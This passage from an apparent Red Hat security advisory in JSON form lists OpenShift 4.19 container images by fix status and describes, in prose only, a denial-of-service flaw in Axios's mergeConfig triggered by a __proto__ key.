"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
